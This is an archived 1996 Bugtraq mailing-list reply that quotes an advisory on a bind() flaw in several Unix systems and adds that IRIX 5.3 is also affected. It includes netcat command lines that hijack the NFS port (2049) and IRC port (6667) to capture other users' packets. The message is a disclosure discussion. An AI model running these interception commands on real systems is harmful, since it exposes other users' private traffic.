[2490] in bugtraq
Re: BoS: bind() Security Problems
daemon@ATHENA.MIT.EDU (Bernd Lehle)
Wed Jan 31 12:09:16 1996
Date: Wed, 31 Jan 1996 13:18:29 +0100
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Bernd Lehle <Bernd.Lehle@RUS.Uni-Stuttgart.DE>
X-To: nobody@mail.uu.net
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org> from
"Aleph's K-Rad GECOS Field" at Jan 30, 96 03:18:21 pm
>
>
> System Call: bind()
> Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
> Probably others.
> Requirement: account on system.
> Security Compromise: Stealing packets from
> nfsd, yppasswd, ircd, etc.
> Credits: *Hobbit* <hobbit@avian.org>
> bitblt <bitblt@infosoc.com>
> Aleph One <aleph1@underground.org>
> Synopsis: bind() does not properly check
> to make sure there is not a socket
> already bound to INADDR_ANY on the same
> port when binding to a specific address.
>
IRIX 5.3 is vulnerable, too.
> Exploit:
[..]
> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...
To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667
--
> Bernd Lehle - Stuttgart University Computer Center * A supercomputer <
> Visualization / SFB 382 / Astrophysics * is a machine <
> lehle@rus.uni-stuttgart.de Tel:+49-711-685-5531 * that runs an <
> http://www.tat.physik.uni-tuebingen.de/~lehle * endless loop <
> pgp? -> finger bernd@visbl.rus.uni-stuttgart.de * in 2 seconds <
